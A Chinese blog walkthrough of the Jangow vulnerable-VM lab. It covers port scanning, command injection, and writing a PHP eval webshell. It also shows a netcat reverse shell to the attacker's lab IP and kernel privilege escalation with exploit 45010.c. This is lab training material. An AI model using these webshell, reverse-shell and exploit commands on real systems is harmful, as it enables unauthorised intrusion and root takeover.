Jangow靶场打靶过程

于 2024-08-14 21:08:12 发布
阅读量376 收藏 2
点赞数 14
分类专栏: jangow靶场 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/141200337
版权

信息收集

靶场ip

扫描端口

nmap -p- 192.168.204.115

访问80端口看看,点击site跳转到一个网站。

前端页面点点点,看下功能。

GETshell

点开buscar,发现空白页,并且url缺失

输入指令

执行成功

继续上传木马

echo '<?php @eval($_POST['cmd']);?>' > dashuaige.php

没有报错,注入成功

蚁剑连接

反弹shell

sudo nc -lvnp 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.204.99 443 >/tmp/f

获取交互式shell

python3 -c "import pty; pty.spawn('/bin/bash')"

提权

查看系统内核版本

uname -a

寻找存在的漏洞信息

searchsploit ubuntu 4.4.0-31

发现45010.c可用于提权,将文件下载下来

searchsploit -m 45010.c

查看文件发现有适用版本号,并且可进行gcc编译

在本地进行编译

 gcc 45010.c -o tmp
 ./tmp

提权成功

找到flag,至此成功

安全beginner
关注
  • 14
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master靶场搭建过程
09-16
网络安全领域,DVWA(Damn Vulnerable Web Application)是一个非常受欢迎的开源Web应用程序,用于教育和测试安全专业人员以及开发者的网络...记得在使用过程中保持合法和道德,不要在未经授权的环境中进行渗透测试。
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webgoat靶场需要自行搭建
01-19
WebGoat靶场的搭建过程涉及到以下几个关键知识点: 1. **Web服务器搭建**:首先,你需要一个Web服务器来运行WebGoat。这通常可以是Apache HTTP Server或Nginx。安装和配置这些服务器需要了解基本的HTTP服务原理和...
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8385
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
1111111111111111111111
08-13
1111111111111111
javascript笔试题参考整理(答案)(可编辑修改word版).docx
08-13
javascript笔试题参考整理(答案)(可编辑修改word版)
财务收支表-公式计算查询.xlsx
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
集团信息化顶层规划 .pptx
08-13
集团信息化顶层规划 .pptx
stp 焊接机械_包括零件图_机械3D图可修改打包下载.rar
08-13
stp 焊接机械_包括零件图_机械3D图可修改打包下载.rar
Git的使用教程,比较详细
08-13
Git的使用教程,比较详细。
德勤-大型企业业务流程优化及ERP整体规划方案.pptx
08-13
德勤-大型企业业务流程优化及ERP整体规划方案.pptx
PHP新闻网站系统.zip
最新发布
08-13
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
AIOT物联网+智慧医疗解决方案(40页).pptx
08-13
AIOT物联网+智慧医疗解决方案(40页)
Git交互式添加:优雅地掌控每一行代码
08-13
Git是一个开源的分布式版本控制系统,由Linus Torvalds创建,用于有效、高速地处理从小到大的项目版本管理。Git是目前世界上最流行的版本控制系统,被广泛应用于软件开发中,用于代码的版本控制和协同工作。 Git的主要特点包括: 1. **速度**:Git的操作非常快,即使是在非常大的项目中也能保持高性能。 2. **分布式架构**:每个开发者的本地仓库都是一个完整的版本库,可以独立进行提交、分支等操作。 3. **数据完整性**:Git通过SHA-1哈希算法保护代码和历史记录的完整性。 4. **支持分支和合并**:Git支持快速创建和合并分支,方便进行功能开发和错误修复。 5. **支持离线操作**:由于Git是分布式的,开发者可以在没有网络的情况下进行大部分Git操作。 6. **支持多种操作系统**:Git可以在Linux、Unix、Mac和Windows等操作系统上运行。 7. **支持代码合并和代码审查**:Git支持代码合并请求(Merge Request)和代码审查,有助于提高代码质量。 Git通常与GitHub、GitLab或Bitbucket等远程仓库服
学生成绩管理系统(SSH+MYSQL).zip
08-13
学生成绩管理系统(SSH+MYSQL)
财务凭证页模板.xls
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
数字化转型工业大数据智慧矿山平台建设方案.pptx
08-13
数字化转型工业大数据智慧矿山平台建设方案.pptx
pikachu靶场安装过程win7
07-02
Pikachu靶场(通常指的是PikachuBot或类似的机器人软件)的Windows 7安装步骤可能因软件版本和来源的不同而有所差异,但一般包括以下几个基本步骤: 1. **下载安装包**:首先,你需要从官方网站或者其他可信的源下载Pikachu靶场的Windows 7兼容的安装文件,通常是.exe格式。 2. **运行安装程序**:双击下载的安装文件,弹出安装向导,按照提示一步步操作,通常会让你选择安装路径、接受许可协议等。 3. **确认系统要求**:确保你的计算机满足软件的最低硬件和操作系统要求,如处理器速度、内存、图形卡等。 4. **安装组件**:安装过程中可能会询问是否安装必要的依赖项,比如.NET框架或其他库,根据需要勾选或否决。 5. **配置设置**:有些Pikachu靶场可能提供一些配置选项,你可以根据自己的需求调整。 6. **启动Pikachu**:安装完成后,找到开始菜单中的“Pikachu靶场”或相关图标,点击启动。 7. **首次运行可能需要注册或登录**:如果软件需要激活,可能会提示你输入注册信息或激活码。 8. **检查功能**:启动后,测试软件的功能是否正常,如有问题,查阅官方文档或联系技术支持。 由于这是一个通用的指南,并非特定软件的详细说明,如果你遇到具体的问题,记得查阅Pikachu靶场的官方文档或者在线帮助。对于任何未知的软件下载,请务必小心并仅从信誉良好的来源获取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值